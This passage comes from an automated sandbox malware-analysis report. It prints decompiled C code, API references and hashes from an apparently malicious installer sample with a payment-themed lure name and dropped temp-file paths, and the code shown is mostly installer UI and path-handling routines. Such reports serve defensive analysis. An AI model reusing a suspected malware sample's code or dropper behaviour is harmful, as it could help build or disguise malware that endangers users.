                                                                                  						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                                  						_t87 = CreateBrushIndirect( &_v16);
                                                                                  						_v32.bottom = _v32.bottom + 4;
                                                                                  						_a16 = _t87;
                                                                                  						FillRect(_a8,  &_v32, _t87);
                                                                                  						DeleteObject(_a16);
                                                                                  						_v32.top = _v32.top + 4;
                                                                                  					}
                                                                                  					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                                  						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                                                                  						_a16 = _t94;
                                                                                  						if(_t94 != 0) {
                                                                                  							_t128 = _a8;
                                                                                  							_v32.left = 0x10;
                                                                                  							_v32.top = 8;
                                                                                  							SetBkMode(_t128, 1);
                                                                                  							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                                  							_a8 = SelectObject(_t128, _a16);
                                                                                  							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
                                                                                  							SelectObject(_t128, _a8);
                                                                                  							DeleteObject(_a16);
                                                                                  						}
                                                                                  					}
                                                                                  					EndPaint(_a4,  &_v96);
                                                                                  					return 0;
                                                                                  				}
                                                                                  				_t102 = _a16;
                                                                                  				if(_a8 == 0x46) {
                                                                                  					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                                  					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
                                                                                  				}
                                                                                  				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                                                                  			}













                                                                                  0x0040100a
                                                                                  0x00401039
                                                                                  0x00401047
                                                                                  0x0040104d
                                                                                  0x00401051
                                                                                  0x0040105b
                                                                                  0x00401061
                                                                                  0x00401064
                                                                                  0x004010f3
                                                                                  0x00401089
                                                                                  0x0040108c
                                                                                  0x004010a6
                                                                                  0x004010bd
                                                                                  0x004010cc
                                                                                  0x004010cf
                                                                                  0x004010d5
                                                                                  0x004010d9
                                                                                  0x004010e4
                                                                                  0x004010ed
                                                                                  0x004010ef
                                                                                  0x004010ef
                                                                                  0x00401100
                                                                                  0x00401105
                                                                                  0x0040110d
                                                                                  0x00401110
                                                                                  0x00401112
                                                                                  0x00401118
                                                                                  0x0040111f
                                                                                  0x00401126
                                                                                  0x00401130
                                                                                  0x00401142
                                                                                  0x00401156
                                                                                  0x00401160
                                                                                  0x00401165
                                                                                  0x00401165
                                                                                  0x00401110
                                                                                  0x0040116e
                                                                                  0x00000000
                                                                                  0x00401178
                                                                                  0x00401010
                                                                                  0x00401013
                                                                                  0x00401015
                                                                                  0x0040101f
                                                                                  0x0040101f
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                  • GetClientRect.USER32 ref: 0040105B
                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                  • FillRect.USER32 ref: 004010E4
                                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                  • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                  • String ID: F
                                                                                  • API String ID: 941294808-1304234792
                                                                                  • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                                                  • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                                                                                  • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                                                  • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 72%
                                                                                  			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                                                                                  				struct _ITEMIDLIST* _v8;
                                                                                  				signed int _v12;
                                                                                  				signed int _v16;
                                                                                  				signed int _v20;
                                                                                  				signed int _v24;
                                                                                  				signed int _v28;
                                                                                  				signed int _t44;
                                                                                  				WCHAR* _t45;
                                                                                  				signed char _t47;
                                                                                  				signed int _t48;
                                                                                  				short _t59;
                                                                                  				short _t61;
                                                                                  				short _t63;
                                                                                  				void* _t71;
                                                                                  				signed int _t77;
                                                                                  				signed int _t78;
                                                                                  				short _t81;
                                                                                  				short _t82;
                                                                                  				signed char _t84;
                                                                                  				signed int _t85;
                                                                                  				void* _t98;
                                                                                  				void* _t104;
                                                                                  				intOrPtr* _t105;
                                                                                  				void* _t107;
                                                                                  				WCHAR* _t108;
                                                                                  				void* _t110;
                                                                                  
                                                                                  				_t107 = __esi;
                                                                                  				_t104 = __edi;
                                                                                  				_t71 = __ebx;
                                                                                  				_t44 = _a8;
                                                                                  				if(_t44 < 0) {
                                                                                  					_t44 =  *( *0x42923c - 4 + _t44 * 4);
                                                                                  				}
                                                                                  				_push(_t71);
                                                                                  				_push(_t107);
                                                                                  				_push(_t104);
                                                                                  				_t105 =  *0x42a298 + _t44 * 2;
                                                                                  				_t45 = 0x428200;
                                                                                  				_t108 = 0x428200;
                                                                                  				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
                                                                                  					_t108 = _a4;
                                                                                  					_a4 = _a4 & 0x00000000;
                                                                                  				}
                                                                                  				_t81 =  *_t105;
                                                                                  				_a8 = _t81;
                                                                                  				if(_t81 == 0) {
                                                                                  					L43:
                                                                                  					 *_t108 =  *_t108 & 0x00000000;
                                                                                  					if(_a4 == 0) {
                                                                                  						return _t45;
                                                                                  					}
                                                                                  					return E00406668(_a4, _t45);
                                                                                  				} else {
                                                                                  					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                                                                                  						_t98 = 2;
                                                                                  						_t105 = _t105 + _t98;
                                                                                  						if(_t81 >= 4) {
                                                                                  							if(__eflags != 0) {
                                                                                  								 *_t108 = _t81;
                                                                                  								_t108 = _t108 + _t98;
                                                                                  								__eflags = _t108;
                                                                                  							} else {
                                                                                  								 *_t108 =  *_t105;
                                                                                  								_t108 = _t108 + _t98;
                                                                                  								_t105 = _t105 + _t98;
                                                                                  							}
                                                                                  							L42:
                                                                                  							_t82 =  *_t105;
                                                                                  							_a8 = _t82;
                                                                                  							if(_t82 != 0) {
                                                                                  								_t81 = _a8;
                                                                                  								continue;
                                                                                  							}
                                                                                  							goto L43;
                                                                                  						}
                                                                                  						_t84 =  *((intOrPtr*)(_t105 + 1));
                                                                                  						_t47 =  *_t105;
                                                                                  						_t48 = _t47 & 0x000000ff;
                                                                                  						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                                                                                  						_t85 = _t84 & 0x000000ff;
                                                                                  						_v28 = _t48 | 0x00008000;
                                                                                  						_t77 = 2;
                                                                                  						_v16 = _t85;
                                                                                  						_t105 = _t105 + _t77;
                                                                                  						_v24 = _t48;
                                                                                  						_v20 = _t85 | 0x00008000;
                                                                                  						if(_a8 != _t77) {
                                                                                  							__eflags = _a8 - 3;
                                                                                  							if(_a8 != 3) {
                                                                                  								__eflags = _a8 - 1;
                                                                                  								if(__eflags == 0) {
                                                                                  									__eflags = (_t48 | 0xffffffff) - _v12;
                                                                                  									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                                                                                  								}
                                                                                  								L38:
                                                                                  								_t108 =  &(_t108[lstrlenW(_t108)]);
                                                                                  								_t45 = 0x428200;
                                                                                  								goto L42;
                                                                                  							}
                                                                                  							_t78 = _v12;
                                                                                  							__eflags = _t78 - 0x1d;
                                                                                  							if(_t78 != 0x1d) {
                                                                                  								__eflags = (_t78 << 0xb) + 0x42b000;
                                                                                  								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
                                                                                  							} else {
                                                                                  								E004065AF(_t108,  *0x42a268);
                                                                                  							}
                                                                                  							__eflags = _t78 + 0xffffffeb - 7;
                                                                                  							if(__eflags < 0) {
                                                                                  								L29:
                                                                                  								E004068EF(_t108);
                                                                                  							}
                                                                                  							goto L38;
                                                                                  						}
                                                                                  						if( *0x42a2e4 != 0) {
                                                                                  							_t77 = 4;
                                                                                  						}
                                                                                  						_t121 = _t48;
                                                                                  						if(_t48 >= 0) {
                                                                                  							__eflags = _t48 - 0x25;
                                                                                  							if(_t48 != 0x25) {
                                                                                  								__eflags = _t48 - 0x24;
                                                                                  								if(_t48 == 0x24) {
                                                                                  									GetWindowsDirectoryW(_t108, 0x400);
                                                                                  									_t77 = 0;
                                                                                  								}
                                                                                  								while(1) {
                                                                                  									__eflags = _t77;
                                                                                  									if(_t77 == 0) {
                                                                                  										goto L26;
                                                                                  									}
                                                                                  									_t59 =  *0x42a264;
                                                                                  									_t77 = _t77 - 1;
                                                                                  									__eflags = _t59;
                                                                                  									if(_t59 == 0) {
                                                                                  										L22:
                                                                                  										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                                                                                  										__eflags = _t61;
                                                                                  										if(_t61 != 0) {
                                                                                  											L24:
                                                                                  											 *_t108 =  *_t108 & 0x00000000;
                                                                                  											__eflags =  *_t108;
                                                                                  											continue;
                                                                                  										}
                                                                                  										__imp__SHGetPathFromIDListW(_v8, _t108);
                                                                                  										_a8 = _t61;
                                                                                  										__imp__CoTaskMemFree(_v8);
                                                                                  										__eflags = _a8;
                                                                                  										if(_a8 != 0) {
                                                                                  											goto L26;
                                                                                  										}
                                                                                  										goto L24;
                                                                                  									}
                                                                                  									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                                                                                  									__eflags = _t63;
                                                                                  									if(_t63 == 0) {
                                                                                  										goto L26;
                                                                                  									}
                                                                                  									goto L22;
                                                                                  								}
                                                                                  								goto L26;
                                                                                  							}
                                                                                  							GetSystemDirectoryW(_t108, 0x400);
                                                                                  							goto L26;
                                                                                  						} else {
                                                                                  							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                                                                                  							if( *_t108 != 0) {
                                                                                  								L27:
                                                                                  								if(_v16 == 0x1a) {
                                                                                  									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                                  								}
                                                                                  								goto L29;
                                                                                  							}
                                                                                  							E004066A5(_t77, _t105, _t108, _t108, _v16);
                                                                                  							L26:
                                                                                  							if( *_t108 == 0) {
                                                                                  								goto L29;
                                                                                  							}
                                                                                  							goto L27;
                                                                                  						}
                                                                                  					}
                                                                                  					goto L43;
                                                                                  				}
                                                                                  			}





























                                                                                  0x004066a5
                                                                                  0x004066a5
                                                                                  0x004066a5
                                                                                  0x004066ab
                                                                                  0x004066b0
                                                                                  0x004066c1
                                                                                  0x004066c1
                                                                                  0x004066c9
                                                                                  0x004066ca
                                                                                  0x004066cb
                                                                                  0x004066cc
                                                                                  0x004066cf
                                                                                  0x004066d7
                                                                                  0x004066d9
                                                                                  0x004066ea
                                                                                  0x004066ed
                                                                                  0x004066ed
                                                                                  0x004066f1
                                                                                  0x004066f7
                                                                                  0x004066fa
                                                                                  0x004068d5
                                                                                  0x004068d5
                                                                                  0x004068e0
                                                                                  0x004068ec
                                                                                  0x004068ec
                                                                                  0x00000000
                                                                                  0x00406700
                                                                                  0x00406705
                                                                                  0x0040671a
                                                                                  0x0040671b
                                                                                  0x00406721
                                                                                  0x004068b3
                                                                                  0x004068c1
                                                                                  0x004068c4
                                                                                  0x004068c4
                                                                                  0x004068b5
                                                                                  0x004068b8
                                                                                  0x004068bb
                                                                                  0x004068bd
                                                                                  0x004068bd
                                                                                  0x004068c6
                                                                                  0x004068c6
                                                                                  0x004068cc
                                                                                  0x004068cf
                                                                                  0x00406702
                                                                                  0x00000000
                                                                                  0x00406702
                                                                                  0x00000000
                                                                                  0x004068cf
                                                                                  0x00406727
                                                                                  0x0040672a
                                                                                  0x00406739
                                                                                  0x00406740
                                                                                  0x0040674c
                                                                                  0x0040674f
                                                                                  0x00406752
                                                                                  0x00406753
                                                                                  0x00406758
                                                                                  0x0040675e
                                                                                  0x00406761
                                                                                  0x00406764
                                                                                  0x00406857
                                                                                  0x0040685c
                                                                                  0x0040688f
                                                                                  0x00406894
                                                                                  0x00406899
                                                                                  0x0040689e
                                                                                  0x0040689e
                                                                                  0x004068a3
                                                                                  0x004068a9
                                                                                  0x004068ac
                                                                                  0x00000000
                                                                                  0x004068ac
                                                                                  0x0040685e
                                                                                  0x00406861
                                                                                  0x00406864
                                                                                  0x00406879
                                                                                  0x00406880
                                                                                  0x00406866
                                                                                  0x0040686d
                                                                                  0x0040686d
                                                                                  0x00406888
                                                                                  0x0040688b
                                                                                  0x0040684f
                                                                                  0x00406850
                                                                                  0x00406850
                                                                                  0x00000000
                                                                                  0x0040688b
                                                                                  0x00406771
                                                                                  0x00406775
                                                                                  0x00406775
                                                                                  0x00406776
                                                                                  0x00406778
                                                                                  0x004067b5
                                                                                  0x004067b8
                                                                                  0x004067c8
                                                                                  0x004067cb
                                                                                  0x004067d3
                                                                                  0x004067d9
                                                                                  0x004067d9
                                                                                  0x00406834
                                                                                  0x00406834
                                                                                  0x00406836
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004067dd
                                                                                  0x004067e2
                                                                                  0x004067e3
                                                                                  0x004067e5
                                                                                  0x004067fc
                                                                                  0x0040680a
                                                                                  0x00406810
                                                                                  0x00406812
                                                                                  0x00406830
                                                                                  0x00406830
                                                                                  0x00406830
                                                                                  0x00000000
                                                                                  0x00406830
                                                                                  0x00406818
                                                                                  0x00406821
                                                                                  0x00406824
                                                                                  0x0040682a
                                                                                  0x0040682e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040682e
                                                                                  0x004067f6
                                                                                  0x004067f8
                                                                                  0x004067fa
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004067fa
                                                                                  0x00000000
                                                                                  0x00406834
                                                                                  0x004067c0
                                                                                  0x00000000
                                                                                  0x0040677a
                                                                                  0x00406798
                                                                                  0x004067a1
                                                                                  0x0040683e
                                                                                  0x00406842
                                                                                  0x0040684a
                                                                                  0x0040684a
                                                                                  0x00000000
                                                                                  0x00406842
                                                                                  0x004067ab
                                                                                  0x00406838
                                                                                  0x0040683c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040683c
                                                                                  0x00406778
                                                                                  0x00000000
                                                                                  0x00406705

                                                                                  APIs
                                                                                  • GetSystemDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,00000400), ref: 004067C0
                                                                                  • GetWindowsDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,00000400,00000000,00422728,?,00405701,00422728,00000000,00000000,00000000,00000000), ref: 004067D3
                                                                                  • lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                  • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                                  • String ID: "C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                  • API String ID: 4260037668-746024
                                                                                  • Opcode ID: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                                                  • Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
                                                                                  • Opcode Fuzzy Hash: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                                                  • Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E004056CA(signed int _a4, WCHAR* _a8) {
                                                                                  				struct HWND__* _v8;
                                                                                  				signed int _v12;
                                                                                  				WCHAR* _v32;
                                                                                  				long _v44;
                                                                                  				int _v48;
                                                                                  				void* _v52;
                                                                                  				void* __ebx;
                                                                                  				void* __edi;
                                                                                  				void* __esi;
                                                                                  				WCHAR* _t27;
                                                                                  				signed int _t28;
                                                                                  				long _t29;
                                                                                  				signed int _t37;
                                                                                  				signed int _t38;
                                                                                  
                                                                                  				_t27 =  *0x429244;
                                                                                  				_v8 = _t27;
                                                                                  				if(_t27 != 0) {
                                                                                  					_t37 =  *0x42a314;
                                                                                  					_v12 = _t37;
                                                                                  					_t38 = _t37 & 0x00000001;
                                                                                  					if(_t38 == 0) {
                                                                                  						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
                                                                                  					}
                                                                                  					_t27 = lstrlenW(0x422728);
                                                                                  					_a4 = _t27;
                                                                                  					if(_a8 == 0) {
                                                                                  						L6:
                                                                                  						if((_v12 & 0x00000004) == 0) {
                                                                                  							_t27 = SetWindowTextW( *0x429228, 0x422728);
                                                                                  						}
                                                                                  						if((_v12 & 0x00000002) == 0) {
                                                                                  							_v32 = 0x422728;
                                                                                  							_v52 = 1;
                                                                                  							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
                                                                                  							_v44 = 0;
                                                                                  							_v48 = _t29 - _t38;
                                                                                  							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
                                                                                  							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
                                                                                  						}
                                                                                  						if(_t38 != 0) {
                                                                                  							_t28 = _a4;
                                                                                  							0x422728[_t28] = 0;
                                                                                  							return _t28;
                                                                                  						}
                                                                                  					} else {
                                                                                  						_t27 = lstrlenW(_a8) + _a4;
                                                                                  						if(_t27 < 0x1000) {
                                                                                  							_t27 = lstrcatW(0x422728, _a8);
                                                                                  							goto L6;
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				return _t27;
                                                                                  			}

















                                                                                  0x004056d0
                                                                                  0x004056da
                                                                                  0x004056df
                                                                                  0x004056e5
                                                                                  0x004056f0
                                                                                  0x004056f3
                                                                                  0x004056f6
                                                                                  0x004056fc
                                                                                  0x004056fc
                                                                                  0x00405702
                                                                                  0x0040570a
                                                                                  0x0040570d
                                                                                  0x0040572a
                                                                                  0x0040572e
                                                                                  0x00405737
                                                                                  0x00405737
                                                                                  0x00405741
                                                                                  0x0040574a
                                                                                  0x00405756
                                                                                  0x0040575d
                                                                                  0x00405761
                                                                                  0x00405764
                                                                                  0x00405777
                                                                                  0x00405785
                                                                                  0x00405785
                                                                                  0x00405789
                                                                                  0x0040578b
                                                                                  0x0040578e
                                                                                  0x00000000
                                                                                  0x0040578e
                                                                                  0x0040570f
                                                                                  0x00405717
                                                                                  0x0040571f
                                                                                  0x00405725
                                                                                  0x00000000
                                                                                  0x00405725
                                                                                  0x0040571f
                                                                                  0x0040570d
                                                                                  0x0040579a

                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                  • lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                  • lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                                  • SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                    • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                    • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                                  • String ID: ('B
                                                                                  • API String ID: 1495540970-2332581011
                                                                                  • Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                                                  • Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
                                                                                  • Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                                                  • Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                                  				struct tagLOGBRUSH _v16;
                                                                                  				long _t39;
                                                                                  				long _t41;
                                                                                  				void* _t44;
                                                                                  				signed char _t50;
                                                                                  				long* _t54;
                                                                                  
                                                                                  				if(_a4 + 0xfffffecd > 5) {
                                                                                  					L18:
                                                                                  					return 0;
                                                                                  				}
                                                                                  				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                                                                                  				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                                                  					goto L18;
                                                                                  				} else {
                                                                                  					_t50 = _t54[5];
                                                                                  					if((_t50 & 0xffffffe0) != 0) {
                                                                                  						goto L18;
                                                                                  					}
                                                                                  					_t39 =  *_t54;
                                                                                  					if((_t50 & 0x00000002) != 0) {
                                                                                  						_t39 = GetSysColor(_t39);
                                                                                  					}
                                                                                  					if((_t54[5] & 0x00000001) != 0) {
                                                                                  						SetTextColor(_a8, _t39);
                                                                                  					}
                                                                                  					SetBkMode(_a8, _t54[4]);
                                                                                  					_t41 = _t54[1];
                                                                                  					_v16.lbColor = _t41;
                                                                                  					if((_t54[5] & 0x00000008) != 0) {
                                                                                  						_t41 = GetSysColor(_t41);
                                                                                  						_v16.lbColor = _t41;
                                                                                  					}
                                                                                  					if((_t54[5] & 0x00000004) != 0) {
                                                                                  						SetBkColor(_a8, _t41);
                                                                                  					}
                                                                                  					if((_t54[5] & 0x00000010) != 0) {
                                                                                  						_v16.lbStyle = _t54[2];
                                                                                  						_t44 = _t54[3];
                                                                                  						if(_t44 != 0) {
                                                                                  							DeleteObject(_t44);
                                                                                  						}
                                                                                  						_t54[3] = CreateBrushIndirect( &_v16);
                                                                                  					}
                                                                                  					return _t54[3];
                                                                                  				}
                                                                                  			}









                                                                                  0x0040463d
                                                                                  0x004046f3
                                                                                  0x00000000
                                                                                  0x004046f3
                                                                                  0x0040464e
                                                                                  0x00404652
                                                                                  0x00000000
                                                                                  0x0040466c
                                                                                  0x0040466c
                                                                                  0x00404675
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00404677
                                                                                  0x00404683
                                                                                  0x00404686
                                                                                  0x00404686
                                                                                  0x0040468c
                                                                                  0x00404692
                                                                                  0x00404692
                                                                                  0x0040469e
                                                                                  0x004046a4
                                                                                  0x004046ab
                                                                                  0x004046ae
                                                                                  0x004046b1
                                                                                  0x004046b3
                                                                                  0x004046b3
                                                                                  0x004046bb
                                                                                  0x004046c1
                                                                                  0x004046c1
                                                                                  0x004046cb
                                                                                  0x004046d0
                                                                                  0x004046d3
                                                                                  0x004046d8
                                                                                  0x004046db
                                                                                  0x004046db
                                                                                  0x004046eb
                                                                                  0x004046eb
                                                                                  0x00000000
                                                                                  0x004046ee

                                                                                  APIs
                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 00404648
                                                                                  • GetSysColor.USER32(00000000), ref: 00404686
                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00404692
                                                                                  • SetBkMode.GDI32(?,?), ref: 0040469E
                                                                                  • GetSysColor.USER32(?), ref: 004046B1
                                                                                  • SetBkColor.GDI32(?,?), ref: 004046C1
                                                                                  • DeleteObject.GDI32(?), ref: 004046DB
                                                                                  • CreateBrushIndirect.GDI32(?), ref: 004046E5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
